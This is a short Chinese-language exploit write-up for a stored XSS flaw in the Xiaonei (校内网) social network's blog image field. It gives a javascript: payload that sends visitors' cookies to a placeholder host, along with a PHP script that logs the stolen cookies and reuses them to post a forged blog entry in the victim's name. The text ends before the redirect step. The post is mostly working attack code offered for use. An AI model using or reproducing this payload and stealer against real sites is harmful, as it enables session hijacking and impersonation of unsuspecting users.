校内网一个跨站漏洞的利用 's

作者：Flyh4t

校内网在发blog时对插入图片过滤不严格，存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发：

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下：

<?php ob_start(); $url = 'blog.xiaonei.com'; $cookie=$_GET['cookie']; $cookie1=$cookie."/r/n/r/n"; fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt  //发一条伪造的日志，这条日志里面也可以插入恶意代码 $sock = fsockopen("$url", 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)/n"); $data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";  fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1/r/n"); fwrite($sock, "Accept: */*/r/n"); fwrite($sock, "Referer: http://$url/r/n"); fwrite($sock, "Accept-Language: zh-cn/r/n"); fwrite($sock, "Content-Type: application/x-www-form-urlencoded/r/n"); fwrite($sock, "Accept-Encoding: gzip, deflate/r/n"); fwrite($sock, "User-Agent: Mozilla/r/n"); fwrite($sock, "Host: $url/r/n"); fwrite($sock, "Content-Length: ".strlen($data)."/r/n"); fwrite($sock, "Connection: Keep-Alive/r/n"); fwrite($sock, "Cache-Control: no-cache/r/n"); fwrite($sock, "Cookie:".$cookie."/r/n/r/n"); fwrite($sock, $data);